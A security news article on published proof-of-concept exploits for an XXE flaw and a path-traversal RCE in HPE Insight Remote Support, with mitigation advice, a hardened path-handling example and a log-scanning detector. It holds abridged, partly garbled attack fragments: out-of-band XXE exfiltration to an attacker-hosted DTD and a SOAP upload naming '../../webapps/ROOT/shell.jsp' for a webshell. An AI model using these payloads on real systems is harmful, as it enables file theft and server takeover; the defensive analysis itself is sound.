Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676).
These flaws affect IRS versions prior to v7.14.0.629 and expose systems to arbitrary file disclosure and full SYSTEM-level command execution.
Technical Breakdown of Exploitation Chain
XXE Vulnerability in Device Registration Workflow (CVE-2024-53675)
The XXE vulnerability originates in the validateAgainstXSD method of HPE's ucacore library, which validates XML input during device registration without restricting Document Type Definition (DTD) processing, according to the researchers' GitHub write-up. Because the parser honours attacker-supplied DTDs, external (parameter) entities can be declared and resolved.
Attackers can exploit this by injecting malicious XML entities into the
Below is an abridged PoC exploiting the XXE to exfiltrate the first line of C:\users\Administrator\Desktop\hello.txt:
http://www.hp.com/it/sa/reg/Registration/RegisterDevice
&callhome;]]>
The attacker-hosted malicious.dtd forces the XML parser to embed the file contents in an HTTP request to the attacker's server (out-of-band exfiltration):
">
%eval;
%exfiltrate;
Path Traversal to RCE (CVE-2024-53676)
The RCE vulnerability resides in the processAtatchmentDataStream method of the DataPackageReceiverWebSvcHelper class.
This function improperly validates the attachmentName parameter during file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling directory traversal.
Attackers can upload malicious JSP files to arbitrary directories (e.g., Tomcat web roots) by crafting SOAP requests with ../ sequences:
import base64

malicious_jsp = b'<%= "jsp" %>'  # constructed placeholder; the PoC's JSP body is not shown on the page
# Abridged SOAP body: only the traversal file name and the base64 payload survive here
xml_body = f"""
../../webapps/ROOT/shell.jsp
{base64.b64encode(malicious_jsp).decode()}
"""
The vulnerability stems from concatenating the unvalidated attachmentName into attachmentFileLocation, so the attacker chooses where the uploaded file is written and can overwrite arbitrary files the service account can reach:
String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName;
File file = new File(attachmentFileLocation);
file.createNewFile(); // attacker controls the full path; the upload body is then written to it
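To make the traversal concrete, here is an added example (not HPE's code and not the researchers' PoC) that mirrors the Java concatenation above in Python and places a hardened version beside it. The attachment directory value is an assumption; the hardened logic is what a reviewer would expect rather than a description of HPE's actual patch.

```python
import posixpath
import re

# Allowlist for a bare attachment file name: starts with an alphanumeric,
# contains no separators in any spelling, bounded length.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def vulnerable_location(attachment_dir: str, attachment_name: str) -> str:
    """Mirror of the Java concatenation on the page:
    attachmentFileDirectory + File.separatorChar + attachmentName
    (POSIX separator used so the result is identical on every platform)."""
    return attachment_dir + "/" + attachment_name


def resolves_outside(attachment_dir: str, location: str) -> bool:
    """True if `location`, once '..' segments are collapsed, is not under
    attachment_dir. Both arguments must be absolute POSIX paths."""
    base = posixpath.normpath(attachment_dir)
    target = posixpath.normpath(location)
    return posixpath.commonpath([base, target]) != base


def is_safe_attachment_name(attachment_name: str) -> bool:
    """Reject traversal in every spelling ('/', '\\', '..' components, NUL,
    percent-encoded dots) by allowlisting rather than blocklisting."""
    return bool(SAFE_NAME.fullmatch(attachment_name))


def hardened_location(attachment_dir: str, attachment_name: str) -> str:
    """Hardened form of the concatenation (an assumption, not HPE's patch):
    allowlist the name, join it, then confirm the normalized result stays
    inside attachment_dir as a second, independent check."""
    if not is_safe_attachment_name(attachment_name):
        raise ValueError(f"rejected attachment name: {attachment_name!r}")
    location = posixpath.join(attachment_dir, attachment_name)
    if resolves_outside(attachment_dir, location):
        raise ValueError(f"path escapes attachment directory: {location}")
    return location


if __name__ == "__main__":
    # Constructed directory; the real attachmentFileDirectory value is not on the page.
    attachment_dir = "/srv/irs/attachments"
    for name in ("ahs-report.zip", "../../webapps/ROOT/shell.jsp"):
        loc = vulnerable_location(attachment_dir, name)
        print(f"{name!r}: vulnerable -> {loc} (escapes={resolves_outside(attachment_dir, loc)})")
        try:
            print(f"{name!r}: hardened   -> {hardened_location(attachment_dir, name)}")
        except ValueError as exc:
            print(f"{name!r}: hardened   -> {exc}")
```

The allowlist is the real fix; the normpath/commonpath check only exists to catch a future regression in the allowlist. Because IRS runs on Windows, backslash traversal is as dangerous as the forward-slash form the PoC uses, which is why the regex admits neither.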
While the XXE exploit reliably leaks the first line of a file, the researchers noted that multi-line files are hard to retrieve because of constraints on how the parser embeds the leaked content in the exfiltration request.
The RCE exploit, however, has a critical dependency: successful exploitation requires a valid oosId (device identifier) and registrationToken, which attackers must obtain by other means (the article suggests brute-forcing, or using the XXE to read them from disk).
In lab environments, unregistered devices triggered errors that halted attachment processing:
[ERROR] DataPackageReceiverWebSvcHelper: This device (oosId: 93f6…e39) is not found…aborted processing.
Despite this, attackers with valid credentials (e.g., compromised partner accounts) could chain both vulnerabilities to:
- Steal oosId/registrationToken via XXE
- Upload JSP webshells via RCE
Mitigation and Patch Status
HPE addressed both issues in IRS v7.14.0.629 through:
- Disabling DTD processing in XML validators
- Implementing input sanitization for attachmentName parameters
- Adding authentication checks for device registration workflows
Organizations using IRS should upgrade to the patched version immediately and audit logs for suspicious SOAP requests to the /DeviceRegistration or /DataPackageReceiver endpoints. Note that the DTD and the traversal file name both travel in the POST body, so plain access logs only reveal which endpoint was hit; catching the payloads themselves requires body inspection at a reverse proxy, WAF or packet capture.
Network defenders can also block external access to these paths if HPE IRS operates in an internal-only capacity.
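As an added example of the audit described above (not part of the original article, and not an HPE-provided detection), the check below runs over a constructed capture of SOAP requests and flags the two indicators the advisory describes: a DTD in a registration request and a '..' segment in a DataPackageReceiver upload. The IP addresses, the service path under /DeviceRegistration and the SOAP element names are assumptions. The same DTD check can also sit server-side as a pre-parse guard that rejects any body containing a DOCTYPE before it reaches the XML validator.

```python
import re
from dataclasses import dataclass

# Endpoint prefixes named in the advisory text; other paths are ignored.
WATCHED_PATHS = ("/DeviceRegistration", "/DataPackageReceiver")

# A DOCTYPE or ENTITY declaration never belongs in a legitimate IRS SOAP body,
# and neither does a '..' path segment in any spelling (raw, backslash, percent-encoded).
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)", re.IGNORECASE)


@dataclass
class SoapRequest:
    src: str
    method: str
    path: str
    body: str


def classify(req: SoapRequest) -> list[str]:
    """Return the indicator names that fire for one captured request."""
    findings: list[str] = []
    if not req.path.startswith(WATCHED_PATHS):
        return findings
    if DTD_RE.search(req.body):
        findings.append("dtd-in-soap-body")
    if TRAVERSAL_RE.search(req.body):
        findings.append("traversal-in-soap-body")
    return findings


def scan(requests):
    """Run classify over a capture and keep only the requests with findings."""
    return [(r.src, r.path, f) for r in requests if (f := classify(r))]


# Constructed sample capture (not real traffic). The attacker-side DTD URL,
# the SOAP element names and the registration path are assumptions.
SAMPLE_CAPTURE = [
    SoapRequest("203.0.113.5", "POST", "/DeviceRegistration",
                '<?xml version="1.0"?><!DOCTYPE reg [<!ENTITY % dtd SYSTEM '
                '"http://203.0.113.5/malicious.dtd"> %dtd;]><RegisterDevice/>'),
    SoapRequest("203.0.113.5", "POST", "/DataPackageReceiver/DataPackageReceiverService.svc",
                "<attachmentName>../../webapps/ROOT/shell.jsp</attachmentName>"),
    SoapRequest("10.20.30.40", "POST", "/DataPackageReceiver/DataPackageReceiverService.svc",
                "<attachmentName>ahs-report.zip</attachmentName>"),
    SoapRequest("10.20.30.40", "GET", "/", ""),
]

if __name__ == "__main__":
    for src, path, findings in scan(SAMPLE_CAPTURE):
        print(f"{src} {path}: {', '.join(findings)}")
```

Tune the traversal pattern to the bodies you actually see: it deliberately ignores '..' inside ordinary file names such as "a..b" and only fires when a separator follows, which keeps false positives down on legitimate AHS report uploads.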